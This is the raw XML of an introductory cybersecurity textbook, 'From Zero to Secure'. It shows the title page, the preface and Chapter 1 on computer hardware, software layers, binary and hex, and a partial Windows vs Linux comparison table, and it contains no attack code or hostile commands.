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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM ZERO TO SECURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">An Introductory Guide to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Information Science &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows &amp; Linux Security for the Aspiring Professional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">By Gary Holden Schneider (Eros)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Student | Network Administrator | Offensive Security Researcher</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub: Gnosisone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2026 Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Preface: Why This Book Exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This book was born from real conversations, real mistakes, real hardware, and real breakthroughs. It represents the knowledge accumulated during an active cybersecurity journey - from wrestling with a Chromebook kernel compilation at 2am, to building an AI-powered penetration testing framework from scratch, to studying for certifications while managing a large network environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Most security books are written by people who already know everything, for people who know nothing. This one is different. It's written by someone in the middle of the journey - and organized so you can follow the same path, step by step, without getting lost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whether you're a student, a career-changer, or a curious IT professional, this guide will take you from basic computer science concepts all the way to offensive security techniques used by real penetration testers. Both Windows and Linux are covered - because in the real world, you will encounter both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="607080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This book is dedicated to everyone who has ever googled an error message at midnight and felt like they were the only person in the world who didn't understand something.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART ONE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">FOUNDATIONS OF COMPUTER SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 1: How Computers Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you can secure something, you have to understand how it works. This chapter lays the foundation for everything else in this book. We'll look at the building blocks of computers - from the physical hardware all the way up to the software you interact with every day.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 The Hardware Layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every computer - whether it's a server in a data center, your laptop, a Raspberry Pi, or a smartphone - shares the same fundamental components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU (Central Processing Unit): The brain. Executes instructions. Key specs: core count, clock speed (GHz), architecture (x86, ARM, AMD64).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RAM (Random Access Memory): Short-term memory. Fast, volatile. Everything currently running lives here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage (HDD/SSD/NVMe): Long-term memory. Persistent. Your files, OS, and programs live here when not in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Motherboard: The highway. Connects everything together via buses and controllers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPU (Graphics Processing Unit): Specialized processor. Originally for graphics, now also used for AI/ML and password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIC (Network Interface Card): Your connection to the network. Has a MAC address burned in at the factory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PSU (Power Supply Unit): Converts AC wall power to the DC voltages components need. Often overlooked but critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E5F8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LAB NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5E8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware knowledge is NOT optional in cybersecurity. Physical access = game over in most scenarios. Understanding your hardware helps you understand your attack surface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 The Software Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Software is layered. Think of it like an onion - each layer sits on top of the one below it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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What It Is</w:t>
            </w:r>
          </w:p>
        </w:tc>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Examples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Application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Programs users interact with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Chrome, Metasploit, Word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Operating System</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Manages hardware and resources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Windows 11, Kali Linux, macOS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Kernel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Core OS component, talks to hardware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NT Kernel (Windows), Linux Kernel</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Drivers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Hardware-specific code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GPU drivers, NIC drivers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Firmware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Code burned into hardware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BIOS/UEFI, NIC firmware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Hardware</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Physical components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CPU, RAM, storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This layering matters enormously in security. A vulnerability at a lower layer (like a firmware bug) can completely bypass protections at higher layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Bits, Bytes, and Binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Computers speak binary - everything is ultimately 0s and 1s. Here's why that matters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1 bit = one binary digit (0 or 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1 byte = 8 bits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hexadecimal (hex) = base-16 numbering (0-9, A-F). Used constantly in security work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory addresses, hash values, shellcode, and network data are all expressed in hex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: The letter 'A' = decimal 65 = hex 0x41 = binary 01000001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: IPv4 address 192.168.1.1 in hex = C0.A8.01.01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">When reading exploit code, network captures, or memory dumps, you will constantly see hex values. Learn to read them fluently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Operating Systems: Windows vs Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The two operating systems you'll encounter most in cybersecurity are Windows and Linux. Understanding both - not just one - is what separates competent security professionals from average ones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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930"/>
        <w:gridCol w:w="2930"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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93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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Linux</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Default Shell</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CMD / PowerShell</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Bash / Zsh / Fish</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File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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NTFS, FAT32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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ext4, btrfs, xfs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Permissions</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ACL / NTFS Permissions</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rwx / chmod / sudo</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Package Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
